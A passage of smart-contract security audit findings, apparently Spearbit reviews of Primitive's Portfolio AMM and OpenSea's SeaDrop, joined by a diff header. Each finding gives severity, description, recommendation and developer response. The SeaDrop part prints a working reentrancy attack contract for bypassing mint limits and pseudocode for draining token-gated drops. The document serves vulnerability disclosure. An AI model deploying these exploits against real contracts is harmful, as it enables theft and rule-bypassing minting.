pool.feeGrowthGlobalAsset grows more and is now at 1000e36 again. differenceAsset will be zero. If the user only claims their fees now, they’ll earn 0 fees. Recommendation: LPs need to claim their fees before their checkpoint is reached. Alternatively, consider ways to accurately track LP fees that do not have this issue. Note that the same issue exists for the pool controller’s invariantGrowth but this functionality is not used for anything yet. Primitive: Claiming mechanism was removed. Spearbit: Fees are now always reinvested into the pool, claiming is no longer necessary and was removed. This issue is no longer relevant. 5.4 Low Risk 5.5 Gas Optimization +5.5.1 Unnecessary left shift in encodePoolId Severity: Gas Optimization Context: FVMLib.sol#L220 Description: The encodePoolId performs a left shift of 0. This is a noop. Recommendation: Remove the shl(0, .). Primitive: Resolved in PR 306. Spearbit: Resolved. +5.5.2 _syncPool performs unnecessary pool state updates Severity: Gas Optimization Context: Portfolio.sol#L638-L639 Description: The _syncPool function is only called during a swap. During a swap the liquidity never changes and the pool’s last timestamp has already been updated in _beforeSwapEffects. Recommendation: Consider removing the update to liquidity and lastTimestamp in _syncPool. Primitive: Fixed in PR 333. Spearbit: Fixed, liquidity is not updated again. Timestamp is still updated if it has not been updated yet to make Portfolio more general and work with other RMMs that might not update the timestamp in the beforeSwap hook. 18 +5.5.3 Portfolio.sol gas optimizations Severity: Gas Optimization Context: Portfolio.sol Description: Throughout the contract we’ve identified a number of minor gas optimizations that can be performed. We’ve gathered them into one issue to keep the issue number as small as possible. • L750 The msg.value > 0 check is done also in the __wrapEther__ call • L262 The following substitutions can be optimized in case assets are 0 by moving each instruction within the if’s on lines 256-266 pos.tokensOwedAsset -= claimedAssets.safeCastTo128(); pos.tokensOwedQuote -= claimedQuotes.safeCastTo128(); • L376 Consider using the pool object (if it remains as a storage object) instead of pools[args.poolId] • L444:L445 The following two instructions can be grouped into one. output = args.output; output = output.scaleToWad(... • L436:L443 The internalBalance variable can be discarded due to the fact that it is used only within the input assignment. uint256 internalBalance = getBalance( msg.sender, _state.sell ? pool.pair.tokenAsset : pool.pair.tokenQuote ); input = args.useMax == 1 ? internalBalance : args.input; input = input.scaleToWad( _state.sell ? pool.pair.decimalsAsset : pool.pair.decimalsQuote ); • L808 Assuming that the swap instruction will be one of the most used instructions, might be worth moving it as first if condition to save gas. • L409 The if (args.input == 0) revert ZeroInput(); can be removed as it will result in iteration.input being zero and reverting on L457. Recommendation: Implement the gas optimization suggestions. Primitive: Resolved in PR 309. The only recommendation left is to use the pool object with the storage keyword, however, this might lead to an increase of the size of the contract. We’ll wait until the other branches are merged to see if we can afford this one or not. Also, the msg.value > 0 was removed in the __wrapEther__ function and kept in the _deposit which is the only caller of __wrapEther__. Spearbit: Fixed. 19 5.6 Informational +5.6.1 Incomplete NatSpec comments Severity: Informational Context: IPortfolio.sol##L6 Description: Throughout the IPortofolio.sol interface, various NatSpec comments are missing or incomplete Recommendation: Consider adding the necessary documentation to this file to help 3rd parties easily integrate with a Portfolio. Primitive: Acknowledged. Spearbit: Acknowledged. +5.6.2 Inaccurate Comments Severity: Informational Context:[1] Porfolio.sol#L26, [2] RMM01Portfolio.sol#L130, [3] FVMLib.sol#L94-L95 Description: These comments are inaccurate. [1] The hex value on this line translates to v0.1.0-beta instead of v1.0.0-beta. [2] computeTau returns either the time until pool maturity, or zero if the pool is already expired. [3] These comments do not properly account for the two byte offset from the start of the array (in L94, only in the endpoint of the slice). Recommendation: Correct or remove the inaccuracies. Primitive: Related PR 318. Spearbit: Fixed. +5.6.3 Check for priorityFee should have its own custom error Severity: Informational Context: PortfolioLib.sol#L428 Description: The check for invalid priorityFee within the checkParameters function uses the same custom error as the one for fee. This could lead to confusion in the error output. Recommendation: Since all other checks have their own unique custom errors, one should be added for prior- ityFee error InvalidPriorityFee(uint16 priorityFee); Primitive: Resolved in PR 317. Spearbit: Resolved. 20 +5.6.4 Unclear @dev comment Severity: Informational Context: AccountLib.sol#L123 Description: This comment is misleading. It implies that cache is used to "check" state while it in fact changes it. Recommendation: The comment should be updated to reflect this. Primitive: Resolved in PR 315. Spearbit: Resolved. +5.6.5 Unused custom error Severity: Informational Context: AccountLib.sol#L52 Description: Unused error error AlreadySettled(); Recommendation: This custom error should be removed as it remains unused. (Or given a use) Primitive: Resolved, the custom error has been removed in PR 313. Spearbit: Resolved. +5.6.6 Use named constants Severity: Informational Context: FVMLib.sol#L494 Description: The decodeSwap function compares a value against the constant 6. This value indicates the SWAP_- ASSET constant. sellAsset := eq(6, and(0x0F, byte(0, value))) Recommendation: Consider using named constants instead of inlining constants. This makes the code easier to understand and is future-proof in case the named constant’s value changes in the future. Primitive: Resolved by adding a comment explaining why we are using 6 and what it represents and how bytes1 variable is padded PR 314. Spearbit: Resolved by adding a comment. The risk of discrepancies when the named constant value is changed still exists. 21 +5.6.7 scaleFromWadUp and scaleFromWadUpSigned can underflow Severity: Informational Context: AssemblyLib.sol#L283, AssemblyLib.sol#L303 Description: The scaleFromWadUp and scaleFromWadUpSigned will underflow if the amountWad parameter is 0 because they perform an unchecked subtraction on it: outputDec := add(div(sub(amountWad, 1), factor), 1) // ((a-1) / b) + 1 Recommendation: Note that these functions are currently not used. Consider removing them or performing a checked subtraction. Primitive: Fixed in PR 327. Spearbit: Fixed. +5.6.8 AssemblyLib.pack does not clear lower’s upper bits Severity: Informational Context: AssemblyLib.sol#L222 Description: The pack function packs the 4 lower bits of two bytes into a single byte. If the lower parameter has dirty upper bits, they will be mixed with the higher byte and be set on the final return value. Recommendation: Clear the 4 upper bits of the lower bytes in pack. Primitive: Good catch! Here is the fix PR 303. Spearbit: Resolved. +5.6.9 AssemblyLib.toBytes8/16 functions assumes a max raw length of 16 Severity: Informational Context: AssemblyLib.sol#L159 Description: The toBytes16 function only works if the length of the bytes raw parameter is at most 16 because of the unchcked subtraction: let shift := mul(sub(16, mload(raw)), 8) The same issue exists for the toBytes8 function. Recommendation: Consider checking the length so the subtraction doesn’t underflow. Primitive: Resolved PR 308. Spearbit: Resolved. 22 +5.6.10 PortfolioLib.maturity returns wrong value for perpertual pools Severity: Informational Context: PortfolioLib.sol#L373 Description: A pool can be a perpetual pool that is modeled as a pool with a time to maturity always set to 1 year in the computeTau. However, the maturity function does not return this same maturity. This currently isn’t a problem as maturity is only called from computeTau in case it is not a perpetual pool. Recommendation: Consider adding a dev comment that maturity is inaccurate for perpetual pools or return block.timestamp + SECONDS_PER_YEAR for perpetual pools. Primitive: Fixed in PR 328. Spearbit: Fixed. +5.6.11 _createPool has incomplete NatSpec and event args Severity: Informational Context: Portfolio.sol#L683, Portfolio.sol#L732 Description: The _createPool function contains incomplete NatSpec specifications. Furthermore, the event emitted by this function can be improved by adding more arguments. Recommendation: Consider completing the NatSpec of this function and add more arguments that it would be useful for later reporting and debugging. Primitive: Resolved in PR 311. Spearbit: Resolved. +5.6.12 _liquidityPolicy is cast to a uint8 but it should be a uint16 Severity: Informational Context: Portfolio.sol#L719 Description: During _createPool the pool curve parameters are set. One of them is the jit parameter which is a uint16. It can be assigned the default value of _liquidityPolicy but it is cast to a uint8. If the _liquidityPolicy constant is ever changed to a value greater than type(uint8).max a wrong jit value will be assigned. Recommendation: Cast _liquidityPolicy to a uint16: - jit: hasController ? jit : uint8(_liquidityPolicy), + jit: hasController ? jit : uint16(_liquidityPolicy), Primitive: Resolved in PR 310. Spearbit: Resolved. 23 +5.6.13 Update _feeSavingEffects documentation Severity: Informational Context: Objective.sol#L20 Description: The _feeSavingEffects documentation states: @return bool True if the fees were saved in position’s owed tokens instead of re-invested. Recommendation: There is no position with owed tokens that gets updated in this function as a position refers to a single user position. The function updates _state.feeGrowthGlobal and afterward the global fee accumulator pool.feeGrowthGlobalAsset/Quote for all LPs. Primitive: Resolved in PR 320. Spearbit: Fixed. +5.6.14 Document checkInvariant and resolve confusing naming Severity: Informational Context: RMM01Portfolio.sol#L141, Objective.sol#L61 Description: The checkInvariant function’s return values are undocumented and the used variables’ names are confusing. Recommendation: Document the checkInvariant function’s return values in Objective and state the decimals the invariant is in (WAD). Consider renaming the variables to better match their scaling units: • nextInvariantWad -> nextInvariantQuote as this variable is in quote units after the scale-down. • nextInvariant -> nextInvariantWad as this variable is in WAD units. • liveInvariantWad -> liveInvariantQuote as this variable is in quote units after the scale-down. Consider doing the invariant check on the WAD invariants which would make the quote invariants obsolete. Primitive: PR 326 removes the confusing scaling altogether. This means the invariant check is for full WAD precision, which is overall better validation that the invariant was not manipulated in a way to take advantage of the scaling that was happening. Spearbit: Fixed. 24 6 Appendix 6.1 Appendix: Summary The two Lead Security Researchers from the main review participated on an extension period from May 8th to May 12th targeting commit 86f8ee. During this period of time 9 issues were found and fixes to issues from the original review were validated or acknowledged. 6.2 High Risk +6.2.1 Token amounts are in wrong decimals if useMax parameter is used Severity: High Risk Context: Portfolio.sol#L227-L237, Portfolio.sol#L444-L448 Description: The allocate and swap functions have a useMax parameter that sets the token amounts to be used to the net balance of the contract. This net balance is the return value of a getNetBalance call, which is in token decimals. The code that follows (getPoolMaxLiquidity for allocate, iteration.input for swap) expects these amounts to be in WAD units. Using this parameter with tokens that don't have 18 decimals does not work correctly. The actual tokens used will be far lower than the expected amount to be used which will lead to user loss as the tokens remain in the contract after the action. Recommendation: Scale these amounts to WAD units. Add tests for both scenarios. Primitive: Fixed in PR 387. Spearbit: Fixed. 6.3 Medium +6.3.1 getAmountOut underestimates outputs leading to losses Severity: Medium Risk Context: BisectionLib.sol#L54 Description: When computing the output, the getAmountOut performs a bisection. However, this bisection returns any root of the function, not the lowest root. As the invariant is far from being strictly monotonic in R_x, it contains many neighbouring roots (> 2e9 in the example) and it's important to return the lowest root, corresponding to the lowest nextDependent, i.e., it leads to a larger output amount amountOut = prevDependent - nextDependent. Users using this function to estimate their outputs can incur significant losses. • Example: Calling getAmountOut(poolId, false, 1, 0, address(0)) with the pool configuration in the example will return amtOut = 123695775, whereas the real max possible amtOut for that swap is 33x higher at 4089008108. The core issue is that invariant is not strictly monotonic, invariant(R_x, R_y) = invariant(R_x + 2_852_- 050_358, R_y), there are many neighbouring roots for the pool configuration: function test_eval() public { uint128 R_y = 56075575; uint128 R_x = 477959654248878758; uint128 stk = 117322822; uint128 vol = 406600000000000000; uint128 tau = 2332800; int256 prev = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); // this is the actual dependent that still satisfies the invariant R_x -= 2_852_050_358; int256 post = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); 25 console2.log("prev: %s", prev); console2.log("post: %s", post); assertEq(post, prev); assertEq(post, 0); } Recommendation: To return the lowest root the bisection has to: • Not return the first midpoint that is a root • If it found a root, it should search in the [lower, midPoint] interval for a lower root. The current code searches in the [midPoint, upper] interval if output or lowerOutput is 0. The if (output * lowerOutput < 0) condition should be changed to if (output * lowerOutput <= 0) function bisection( Bisection memory args, uint256 lower, uint256 upper, uint256 epsilon, uint256 maxIterations, function(Bisection memory,uint256) pure returns (int256) fx ) pure returns (uint256 root) { // ... do { // Bisection uses the point between the lower and upper bounds. // The `distance` is halved each iteration. root = (lower + upper) / 2; - - + ,! + int256 output = fx(args, root); if (output == 0) break; // Found the root. lowerOutput = fx(args, lower); // Lower point could have changed in the previous iteration. // If the product is negative, the root is between the lower and root. // If the product is positive, the root is between the root and upper. if (output * lowerOutput < 0) { // must be <= instead of < so if mid is a root, we keep looking for a lower root on the left (set new upper bound to mid) if (output * lowerOutput <= 0) { upper = root; // Set the new upper bound to the root because we know its between the lower ,! and root. } else { lower = root; // Set the new lower bound to the root because we know its between the upper ,! and root. } // Update the distance with the new bounds. distance = upper - lower; unchecked { iterations++; // Increment the iterator. } } while (...) } This might return the lowest root - 1, which is then increased by 1 in computeSwapStep. Primitive: Recommended changes were made in PR 388. Spearbit: Fixed. 26 +6.3.2 getAmountOut Calculates an Output Value That Sets the Invariant to Zero, Instead of Preserving Its Value Severity: Medium Risk Context: [1] RMM01Lib.sol#L84, [2] RMM01Lib.sol#L215, [3] RMM01Lib.sol#L231 Description: The swap function enforces that the pool's invariant value does not decrease; however, the getA- mountOut function computes an expected swap output based on setting the pool's invariant to zero, which is only equivalent if the initial value of the invariant was already zero--which will generally not be the case as fees accrue and time passes. This is because in computeSwapStep (invoked by getAmountOut [1]), the func- tion (optimizeDependentReserve) passed [2] to the bisection algorithm for root finding returns just the invariant evaluated on the current arguments [3] instead of the difference between the evaluated and original invariant. As a consequence, getAmountOut will return an inaccurate result when the starting value of the invariant is non-zero, leading to either disadvantageous swaps or swaps that revert, depending on whether the current pool invariant value is less than or greater than zero. Recommendation: Add another field to the Bisection struct for the initial invariant value, and modify optimizeDe- pendentReserve to return the difference between the value it currently returns and the initial invariant value. Primitive: Fixed in commit cbec75. Spearbit: Fixed confirmed. +6.3.3 getAmountOut Does Not Adjust The Pool's Reserve Values Based on the liquidityDelta Parameter Severity: Medium Risk Context: RMM01Lib.sol#L111-L128 Description: The liquidityDelta parameter allows a caller to adjust the liquidity in a pool before simulating a swap. However, corresponding adjustments are not made to the per-pool reserves, virtualX and virtualY. This makes the reserve-to-liquidity ratios used in the calculations incorrect, leading to inaccurate results (or potentially reverts if the invalid values fall outside of allowed ranges). Use of the inaccurate swap outputs could lead either to swaps at bad prices or swaps that revert unexpectedly. Recommendation: Adjust the pool reserve values based on the liquidityDelta parameter, add them as addi- tional parameters, or remove the liquidityDelta parameter. Primitive: Fixed by removing liquidityDelta in PR 389. Spearbit: Fix confirmed. 6.4 Low Risk +6.4.1 Bisection always uses max iterations Severity: Low Risk Context: BisectionLib.sol#L51 Description: The current bisection algorithm chooses the mid point as root = (lower + upper) / 2; and the bisection terminates if either upper - lower < 0 or maxIterations is reached. Given upper >= lower throughout the code, it's easy to see that upper - lower < 0 can never be satisfied. The bisection will always use the max iterations. However, even with an epsilon of 1 it can happen that the mid point root is the same as the lower bound if upper = lower + 1. The if (output * lowerOutput < 0) condition will never be satisfied and the else case will always run, setting the lower bound to itself. The bisection will keep iterating with the same lower and upper bounds until max iterations are reached. Recommendation: Consider choosing an epsilon of 1 and changing the condition to: - uint256 constant BISECTION_EPSILON = 0; + uint256 constant BISECTION_EPSILON = 1; 27 - while (distance >= epsilon && iterations != maxIterations); + while (distance > epsilon && iterations < maxIterations); Primitive: Fixed in commit b643d8. Spearbit: Fix verified. +6.4.2 Potential reentrancy in claimFees Severity: Low Risk Context: Portfolio.sol#L890 Description: The contract performs all transfers in the _settlement function and therefore _settlement can call- back to the user for reentrant tokens. To avoid reentrancy issues the _preLock() modifier implements a reentrancy check, but only if the called action is not happening during a multicall execution: function _preLock() private { // Reverts if the lock was already set and the current call is not a multicall. if (_locked != 1 && !_currentMulticall) { revert InvalidReentrancy(); } _locked = 2; } Therefore, multicalls are not protected against reentrancy and _settlement should never be executed, only once at the end of the original multicall function. However, the claimFee function can be called through a multicall by the protocol owner and it calls _settlement even if the execution is part of a multicall. Recommendation: All _settlement() calls outside of multicall should be guarded with if (_currentMulti- call == false) _settlement(); to not execute during a multicall. The claimFee function is missing this guard. Primitive: Fixed in commit 7ee048. Spearbit: Fix confirmed. 6.5 Gas Optimization +6.5.1 Bisection can be optimized Severity: Gas Optimization Context: BisectionLib.sol#L53-L63 Description: The Bisection algorithm tries to find a root of the monotonic function. Evaluating the expensive invariant function at the lower point on each iteration can be avoided by caching the output function value whenever a new lower bound is set. Recommendation: Consider changing the code to: - lowerOutput = fx(args, lower); // Lower point could have changed in the previous iteration. // If the product is negative, the root is between the lower and root. // If the product is positive, the root is between the root and upper. if (output * lowerOutput < 0) { upper = root; // Set the new upper bound to the root because we know its between the lower and root. } else { lower = root; // Set the new lower bound to the root because we know its between the upper and root. lowerOutput = output; // root function value becomes new lower output value + } 28 Primitive: Fixed in PR 386. Spearbit: Fixed. 6.6 Informational +6.6.1 Pool existence check in swap should happen earlier Severity: Informational Context: Portfolio.sol#L431 Description: The swap function makes use of the pool pair's tokens to scale the input decimals before it checks if the pool even exists. Recommendation: Consider checking if the pool exists before using any pool storage variables. Primitive: Fixed in commit e440fc. Spearbit: Fix confirmed. +6.6.2 Pool creation in test uses wrong duration and volatility Severity: Informational Context: HelperConfigsLib.sol#L166-L167 Description: The second path with pairId != 0 in HelperConfigsLib's pool creation calls the createPool method with the volatility and duration parameters swapped, leading to wrong pool creations used in tests that use this path. Recommendation: The volatility parameter comes before the duration parameter. } else { bytes[] memory data = new bytes[](1); data[0] = abi.encodeCall( IPortfolioActions.createPool, ( pairId, // uses 0 pairId as magic variable. todo: maybe change to max uint24? self.controller, self.priorityFeeBps, self.feeBps, self.durationDays, self.volatilityBps, self.volatilityBps, self.durationDays, self.terminalPriceWad, self.reportedPriceWad - - + + ) ); } Primitive: Fixed in PR 384. Spearbit: Fixed. 29 diff --git a/findings_newupdate/spearbit/Seadrop-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Seadrop-Spearbit-Security-Review.txt new file mode 100644 index 0000000..019a1bc --- /dev/null +++ b/findings_newupdate/spearbit/Seadrop-Spearbit-Security-Review.txt @@ -0,0 +1,51 @@ +5.1.1 An allowed signer can sign mints with malicious parameters Severity: High Risk Context: SeaDrop.sol#L259-L266, SeaDrop.sol#L318-L319 Description: An allowed signer (SeaDrop.sol#L318-L319) can sign mints that have either: • mintParams.feeBps equal to 0. • A custom feeRecipient with mintParams.restrictFeeRecipients equal to false to circumvent the check at SeaDrop.sol#L469. And thus avoid the protocol fee being paid or allow the protocol fee to be sent to a desired address decided by the signer. Note that the ERC721SeaDrop owner can allow signers by calling ERC721SeaDrop.updateSigner. Therefore, the owner can allow an address they control as a signer and sign mints that have either one of the above features. OpenSea: This is correct; currently any signer would have ultimate control around the parameters of a mint, and this should be understood by parties who wish to use a centralized signer, ie, self-hosted or in a legal agreement with a marketplace However, we could make it slightly less "trustful" by storing a struct of validation params rather than a simple bool in the mapping struct SignedMintParams { uint80 minMintPrice; uint24 maxMaxTotalMintableByWallet; uint48 minStartTime; uint48 maxEndTime; uint40 maxMaxTokenSupplyForStage; uint16 maxFeeBps; } and always assume restrictFeeRecipients == true. Spearbit: That could work. If this solution is implemented, all the instances of mintParams. would need to be replaced by the stored (storage) parameters in this function. Also, a question comes up as to who would have the authority to set SignedMintParams based on the current architecture. Is there a reason you didn't include dropStageIndex in the SignedMintParams struct? In the above SignedMintParams struct, the last field is named maxFeeBps. Was that intentional or did you meant to name it feeBps? OpenSea dropStageIndex is purely informational for metrics-purposes as part of the SeaDropMint event (we want to be able to see which addresses redeem allow-lists at which stage, etc) In the case of SignedMintParams, the Owner would set it, though for partnered drops, the fee-setting pattern would (Pending confirmation from legal) OpenSea would initialize a signer with a likely be the same as elsewhere. maxFeeBps (which still requires trust that we don't set it to a higher-than-agreed-upon value), and the Owner can then submit the rest of the parameters. maxFeeBps would allow variable feeBps - which is probably a rare use-case, but was a requirement from product for allow-list tiers, which we applied to the other mint methods. Enforcing a maxFeeBps, of course, includes the caveat that it would not prevent a malicious signer from always specifying the maximum fee rate. The Owner should specify maxFeeBps to ensure that a signer cannot specify a feeBps larger than the largest acceptable feeBps. (The signer would be free to specify a lower feeBps, which I'm sure a creator would appreciate) 5 In the general case, if the Owner changes an allowed signer's maxFeeBps (or any other mint parameter) to a value that is no longer acceptable, the signer can refuse to sign mints. +5.1.2 ERC721SeaDrop's modifier onlyOwnerOrAdministrator would allow either the owner or the admin to override the other person's config parameters. Severity: High Risk Context: • ERC721SeaDrop.sol#L106, • ERC721SeaDrop.sol#L212, • ERC721SeaDrop.sol#L289, • ERC721SeaDrop.sol#L345 Description: The following 4 external functions in ERC721SeaDrop have the onlyOwnerOrAdministrator modifier which allows either one to override the other person's work. • updateAllowedSeaDrop • updateAllowList • updateDropURI • updateSigner That means there should be some sort of off-chain trust established between these 2 entities. Otherwise, there are possible vectors of attack. Here is an example of how the owner can override AllowListData.merkleRoot and the other fields within AllowListData to generate proofs for any allowed SeaDrop's mintAllowList endpoint that would have MintParams.feeBps equal to 0: 1. The admin calls updateAllowList to set the Merkle root for this contract and emit ERC721SeaDrop.updateAllowList: SeaDrop.sol#L827 the other parameters as logs. for an allowed SeaDrop implementation The SeaDrop endpoint being called by 2. The owner calls updateAllowList but this time with new parameters, specifically a new Merkle root that is computed from leaves that have MintParams.feeBps == 0. 3. Users/minters use the generated proof corresponding to the latest allow list update and pass their mintParams.feeBps as 0. And thus avoiding the protocol fee deduction for the creatorPaymentAddress (SeaDrop.sol#L187-L194). Recommendation: Only use this implementation of IERC721SeaDrop if there is already a legal off-chain contract and level of trust between the different parties. Otherwise, a different implementation with a stricter separation of roles is recommended. OpenSea: This is related to specific legal/BD requirements - we need to be able to administer the contract for Partners (some may choose to administer it themselves), but for legal clarity, they also need to unambiguously be the "owner" of the contract, in that they have the power to administer it as well. In practice, in this implementation of the contract, both parties should be considered trusted, but also ideally shouldn't have privileges that overstep their bounds (in particular, fee and creator payouts) This contract is intended to be used as the basis for our first few partnered primary mints. As such, there are some assumptions and particular tailored logic to meet our and our partners' needs. (In hindsight, it might have made more sense to split out into a more-generic ERC721SeaDrop, and more-specific ERC721PartnerSeaDrop) Assumptions: • OpenSea will be collecting a fee • There is a good deal of trust (ie, legal contracts) established between the two parties 6 • Some Partners will prefer (or require) us configure drop mechanics and metadata – This is why some functions are onlyOwnerOrAdministrator Requirements, passed down from legal: • OpenSea is the "Administrator" • The Partner is the "Owner" • The Partner is the only entity in control of the pricing of the general drop and the creator payout address • OpenSea is the only entity that can update fees and fee recipients You are correct that this requires trust between the two parties. As mentioned elsewhere, in general, an adminis- trator will not be necessary for all token contracts. In practice, a marketplace (OpenSea) will have to decide whether or not to provide a proof for a mint transaction depending on the allowed fee recipients and specified feeBps off-chain. Spearbit: Acknowledged. +5.1.3 Reentrancy of fee payment can be used to circumvent max mints per wallet check Severity: High Risk Context: SeaDrop.sol#L586 Description: In case of a mintPublic call, the function _checkMintQuantity checks whether the minter has exceeded the parameter maxMintsPerWallet, among other things. However, re-entrancy in the above fee dispersal mechanism can be used to circumvent the check. The following is an example contract that can be employed by the feeRecipent (assume that maxMintsPerWallet is 1): 7 contract MaliciousRecipient { bool public startAttack; address public token; SeaDrop public seaDrop; fallback() external payable { if (startAttack) { startAttack = false; seaDrop.mintPublic{value: 1 ether}({ nftContract: token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); } } // Call `attack` with at least 2 ether. function attack(SeaDrop _seaDrop, address _token) external payable { token = _token; seaDrop = _seaDrop; startAttack = true; _seaDrop.mintPublic{value: 1 ether}({ nftContract: _token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); token = address(0); seaDrop = SeaDrop(address(0)); } } This is especially bad when the parameter PublicDrop.restrictFeeRecipients is set to false, in which case, anyone can circumvent the max mints check, making it a high severity issue. In the other case, only privileged users, i.e., should be part of _allowedFeeRecipients[nftContract] mapping, would be able to circumvent the check--lower severity due to needed privileged access. Also, creatorPaymentAddress can use re-entrancy to get around the same check. See SeaDrop.sol#L571. Recommendation: There are two ways to fix the above issue: 1. Code paths that disperse the ETH as fees should have reentrancy locks set. 2. Change safeTransferETH to use .transfer that only forwards "call stipend" amount of gas to the sub-call. This may break some smart contracts wallets from receiving the ETH. OpenSea: Added reentrancy lock (+ test), and (before this commit) mint was re-arranged to be before payment. See commit 160c034. Spearbit: Acknowledged. 8 5.2 Medium Risk +5.2.1 Cross SeaDrop reentrancy Severity: Medium Risk Context: SeaDrop.sol#L586 Description: The contract that implements IERC721SeaDrop can work with multiple Seadrop implementations, for example, a Seadrop that accepts ETH as payment as well as another Seadrop contract that accepts USDC as payment at the same time. This introduces the risk of cross contract re-entrancy that can be used to circumvent the maxMintsPerWallet check. Here's an example of the attack: 1. Consider an ERC721 token that that has two allowed SeaDrop, one that accepts ETH as payment and the other that accepts USDC as payment, both with public mints and restrictedFeeRecipients set to false. 2. Let maxMintPerWallet be 1 for both these cases. 3. A malicious fee receiver can now do the following: • Call mintPublic for the Seadrop with ETH fees, which does the _checkMintQuantity check and trans- fers the fees in ETH to the receiver. • The receiver now calls mintPublic for Seadrop with USDC fees, which does the _checkMintQuantity check that still passes. • The mint succeeds in the Seadrop-USDC case. • The mint succeeds in the Seadrop-ETH case. • The minter has 2 NFTs even though it's capped at 1. Even if a re-entrancy lock is added in the SeaDrop, the same issue persists as it only enters each Seadrop contract once. Recommendation: Consider adding a reentrancy lock in the ERC-721 contract. Also see the related issue Reentrancy of fee payment can be used to circumvent max mints per wallet check about reentrancy. +5.2.2 Lack of replay protection for mintAllowList and mintSigned Severity: Medium Risk Context: SeaDrop.sol#L227, SeaDrop.sol#L318 In the case of mintSigned (minting via signatures) and mintAllowList (minting via Description: merkle proofs) there are no checks that prevent re-using the same signature or Merkle proof multiple This is indirectly enforced by the _checkMintQuantity function that checks the mint statistics times. using exceeds maxMintsPerWallet. Replays can happen if a wallet does not claim all of maxMintsPerWallet in one transaction. For example, assume that maxMintsPerWallet is set to 2. A user can call mintSigned with a valid signature and quantity = 1 twice. IERC721SeaDrop(nftContract).getMintStats(minter) reverting quantity and the if Typically, contracts try to avoid any forms of signature replays, i.e., a signature can only be used once. This simpli- fies the security properties. In the current implementation of the ERC721Seadrop contract, we couldn't see a way to exploit replay protection to mint beyond what could be minted in a single initial transaction with the maximum value of quantity supplied. However, this relies on the contract correctly implementing IERC721SeaDrop.getMintStats. Recommendation: We recommend implementing replay protection for both cases. Here are some ideas to do this: 1. Consider also including the tokenId for the signature and passing that along in mintSeaDrop call. This way, even if the signature is replayed, minting the same tokenId should not be possible--most ERC-721 libraries prevent this. However, some care should be made to check the following case: mint a fixed token id using the signature, then burn the token id, and resurrecting the same token id by replaying the signature. 9 2. Consider storing the digest and if a digest is used once, then it shouldn't be able to use again. 3. Do not use signature as a way to check if something was consumed. They are malleable. OpenSea: We discussed replay-protection here, and decided it was a more or less acceptable risk for the following reasons: 1. Allow-lists, which also _checkMintQuantity are likewise not redeemed, so Merkle proofs can be re-used in the same way, up to the maximum mint quantity 2. Also like allow-lists, the supplied MintParams specify a startTime and endTime; a signature can supply a short window (minutes) for consumption before a new signature needs to be generated 3. A broken _checkMintQuantity or unreasonably large maxTokensMintable quantity is likely (though not al- ways) exploitable in the first time a signature (or Merkle proof) is used However! Riffing off of the tokenId suggestion (We don't think it's possible to know exactly which starting token ID a given tx will mint), since we're already checking minterNumMinted; we could include that as part of the signature to prevent re-use. Spearbit: 2. A malicious user can always get around the startTime and endTime limits, using some automation. 3. We think that most ERC-721 contracts would assume that Opensea would handle the signature verification and replay protection--the burden of the sale mechanism should be on the Seadrop contract. Also, because this requires the ERC-721 contract to keep track of the number of the number of tokens minted by an address. ERC721A tracks this, but neither Solmate, nor Openzeppelin does this currently. We'd expect some user errors because of this problem. +5.2.3 The digest in SeaDrop.mintSigned is not calculated correctly according to EIP-712 Severity: Medium Risk Context: SeaDrop.sol#L308 Description: mintParams in the calculation of the digest in mintSigned is of struct type, so we would need to calculate and use its hashStruct , not the actual variable on its own. Recommendation: According to EIP-712 the correct digest would be: // include this typehash at the top of the contract bytes32 internal constant _MINT_PARAMS_TYPEHASH = keccak256( "MintParams(" "uint256 mintPrice," "uint256 maxTotalMintableByWallet," "uint256 startTime," "uint256 endTime," "uint256 dropStageIndex," "uint256 maxTokenSupplyForStage," "uint256 feeBps," "bool restrictFeeRecipients" ")" ); ... // hashStruct for mintParams bytes32 mintParamsHashStruct = keccak256( abi.encode( _MINT_PARAMS_TYPEHASH, mintParams.mintPrice, mintParams.maxTotalMintableByWallet, mintParams.startTime, mintParams.endTime, mintParams.dropStageIndex, mintParams.maxTokenSupplyForStage, mintParams.feeBps, 10 mintParams.restrictFeeRecipients ) ); bytes32 digest = keccak256( abi.encodePacked( // EIP-191: `0x19` as set prefix, `0x01` as version byte bytes2(0x1901), _domainSeparator(), keccak256( abi.encode( _SIGNED_MINT_TYPEHASH, nftContract, minter, feeRecipient, mintParamsHashStruct // <--- correction ) ) ) ); This wasn't caught in the test because the test re-uses the same digest calculation. It would be nice to also test it against an external EIP-712 signature calculation. OpenSea: Thanks, digest was fixed and ethers EIP-712 signTypedData has been used to verify in added unit tests here and here. Spearbit: Acknowledged. +5.2.4 Token gated drops with a self-allowed ERC721SeaDrop or a variant of that can lead to the drop getting drained by one person. Severity: Medium Risk Context: SeaDrop.sol#L345 Description: There are scenarios where an actor with only 1 token from an allowed NFT can drain Token Gated Drops that are happening simultaneously or back to back. • Scenario 1 - An ERC721SeaDrop is registered as an allowedNftToken for itself This is a simple example where an ERC721SeaDrop N is registered by the owner or the admin as an allowedNftTo- ken for its own token gated drop and during or before this drop (let's call this drop D) there is another token gated drop ( D0 ) for another allowedNftToken N 0, which does not need to be necessarily an IERC721SeaDrop token. Here is how an actor can drain the self-registered token gated drop: 1. The actor already owns or buys an N 0 token t 0 with wallet w0. 2. During D0, the actor mints an N token t0 with wallet w0 passing N 0, t 0 to mintAllowedTokenHolder and transfer t0 to another wallet if necessary to avoid the max mint per wallet limit (call this wallet w1 which could still be w0). 3. Once D starts or if it is already started, the actor mints another N token t1 with w1 passing N, t0 to mintAl- lowedTokenHolder and transfers t1 to another wallet if necessary to avoid the max mint per wallet limit (call this wallet w2 which could still be w1) 4. Repeat step 3 with the new parameters till we hit the maxTokenSupplyForStage limit for D. 11 # during token gated drop D' t = seaDrop.mintAllowedTokenHolder(N, f, w, {N', [t']}) # during token gated drop D while ( have not reached maxTokenSupplyForStage ): if ( w has reached max token per wallet ): w' = newWallet() N.transfer(w, w', t) w = w' t = seaDrop.mintAllowedTokenHolder(N, f, w, {N, [t]}) • Scenario 2 - Two ERC721SeaDrop tokens are doing a simultaneous token gated drop promotion In this scenario, there are 2 ERC721SeaDrop tokens N1, N2 where they are running simultaneous token gated drop promotions. Each is allowing a wallet/bag holder from the other token to mint a token from their project. So if you have an 